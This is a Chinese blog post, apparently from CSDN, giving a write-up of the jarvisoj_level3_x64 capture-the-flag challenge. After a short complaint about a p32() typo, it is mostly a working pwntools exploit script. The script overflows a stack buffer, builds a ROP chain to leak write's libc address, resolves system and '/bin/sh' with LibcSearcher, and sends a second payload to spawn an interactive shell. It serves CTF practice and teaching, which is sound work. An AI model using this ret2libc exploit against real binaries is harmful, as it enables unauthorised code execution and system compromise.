jarvisoj_level3_x64

在这里插入图片描述

我真是吐了,前一天做到这一题,本来都是非常简单的,但是我在众多p64()中写了一个p32()两天了也没看出来,今天决定打开gdb调试的时候,发现写了一个p32(),心态都崩了…

在这里插入图片描述
exp

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
proc_name = './level3_x64'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 27097)                                                                                                                                                                                
elf = ELF(proc_name)
read_got = elf.got['read']
write_got = elf.got['write']
write_plt = elf.plt['write']
main_addr = elf.sym['main']
payload = b'a' * (0x80 + 0x8) + p64(0x4006b3) + p64(0x1) + p64(0x4006b1) + p64(write_got) + p64(0x0) + p64(write_plt) + p64(main_addr)
p.sendafter('Input:', payload)
p.recv()
write_addr = u64(p.recv(6).ljust(0x8, b'\x00'))
log.info(hex(write_addr))
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')

payload1 = b'a' * (0x80 + 0x8) + p64(0x4006b3) + p64(str_bin_sh) + p64(system_addr)
p.sendafter('Input:', payload1)
p.interactive()

在这里插入图片描述

展开阅读全文

Windows版YOLOv4目标检测实战:训练自己的数据集

04-26
©️2020 CSDN 皮肤主题: 技术黑板 设计师: CSDN官方博客 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值